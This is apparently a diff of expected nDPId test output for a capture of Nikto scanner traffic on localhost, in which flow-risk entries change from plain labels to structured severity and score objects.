 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":372,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":372,"flow_packet_id":1,"flow_last_seen":1576420277264,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"ts_msec":1576420277264,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/DxVAAEAGLSJ\/AAABfwAAAcRwH5D+vze4KlHK9oAYAED+swAAAQEICp1m\/TidZv04R0VUIC8xMjcuc3FsIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":372,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":372,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277264,"flow_last_seen":1576420277264,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420277264,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50288,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":372,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":372,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277264,"flow_last_seen":1576420277264,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420277264,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50288,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":373,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":373,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277266,"flow_last_seen":1576420277266,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"ts_msec":1576420277266,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50290,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":373,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":373,"flow_packet_id":1,"flow_last_seen":1576420277266,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"ts_msec":1576420277266,"pkt":"AAAAAAAAAAAAAAAACABFAADKoqhAAEAGmYN\/AAABfwAAAcRyH5D4dpoDoX2CwIAYAED+vgAAAQEICp1m\/TqdZv06R0VUIC8xMjdfMF8wXzEudGFyLmx6bWEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"}
-00871{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":373,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":373,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277266,"flow_last_seen":1576420277266,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"ts_msec":1576420277266,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50290,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":373,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":373,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277266,"flow_last_seen":1576420277266,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"ts_msec":1576420277266,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50290,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":374,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277268,"flow_last_seen":1576420277268,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"ts_msec":1576420277268,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50292,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":374,"flow_packet_id":1,"flow_last_seen":1576420277268,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"ts_msec":1576420277268,"pkt":"AAAAAAAAAAAAAAAACABFAADKWilAAEAG4gJ\/AAABfwAAAcR0H5DTe2KDABhOQYAYAED+vgAAAQEICp1m\/TydZv08R0VUIC8xMjdfMF8wXzEudGFyLmx6bWEgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00871{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":374,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277268,"flow_last_seen":1576420277268,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"ts_msec":1576420277268,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50292,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":374,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277268,"flow_last_seen":1576420277268,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"ts_msec":1576420277268,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50292,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":375,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":375,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277269,"flow_last_seen":1576420277269,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420277269,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50294,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":375,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":375,"flow_packet_id":1,"flow_last_seen":1576420277269,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"ts_msec":1576420277269,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/XglAAEAG3i1\/AAABfwAAAcR2H5D4uGaj1sX5qYAYAED+swAAAQEICp1m\/T2dZv09R0VUIC8xMjcuY2VyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":375,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":375,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277269,"flow_last_seen":1576420277269,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420277269,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50294,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":375,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":375,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277269,"flow_last_seen":1576420277269,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420277269,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50294,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":376,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":376,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277270,"flow_last_seen":1576420277270,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420277270,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50296,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":376,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":376,"flow_packet_id":1,"flow_last_seen":1576420277270,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"ts_msec":1576420277270,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/A5hAAEAGOJ9\/AAABfwAAAcR4H5CBQjs0aZw5xIAYAED+swAAAQEICp1m\/T6dZv0+R0VUIC8xMjcuY2VyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":376,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":376,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277270,"flow_last_seen":1576420277270,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420277270,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50296,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":376,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":376,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277270,"flow_last_seen":1576420277270,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420277270,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50296,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":377,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":377,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277272,"flow_last_seen":1576420277272,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277272,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50298,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":377,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":377,"flow_packet_id":1,"flow_last_seen":1576420277272,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1576420277272,"pkt":"AAAAAAAAAAAAAAAACABFAADA729AAEAGTMZ\/AAABfwAAAcR6H5Cm4tfMZrHSAYAYAED+tAAAAQEICp1m\/UCdZv1AR0VUIC8xLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":377,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":377,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277272,"flow_last_seen":1576420277272,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277272,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50298,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":377,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":377,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277272,"flow_last_seen":1576420277272,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277272,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50298,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":378,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":378,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277274,"flow_last_seen":1576420277274,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277274,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50300,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":378,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":378,"flow_packet_id":1,"flow_last_seen":1576420277274,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1576420277274,"pkt":"AAAAAAAAAAAAAAAACABFAADAlOZAAEAGp09\/AAABfwAAAcR8H5CKg6xDWKPSxIAYAED+tAAAAQEICp1m\/UKdZv1CR0VUIC8xLnRhci5neiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":378,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":378,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277274,"flow_last_seen":1576420277274,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277274,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50300,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":378,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":378,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277274,"flow_last_seen":1576420277274,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277274,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50300,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":379,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277276,"flow_last_seen":1576420277276,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277276,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50302,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":379,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":379,"flow_packet_id":1,"flow_last_seen":1576420277276,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"ts_msec":1576420277276,"pkt":"AAAAAAAAAAAAAAAACABFAAC9in1AAEAGsbt\/AAABfwAAAcR+H5AyA7LdjyrNp4AYAED+sQAAAQEICp1m\/USdZv1DR0VUIC8wLndhciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":379,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277276,"flow_last_seen":1576420277276,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277276,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50302,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":379,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277276,"flow_last_seen":1576420277276,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277276,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50302,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":380,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277277,"flow_last_seen":1576420277277,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277277,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50304,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
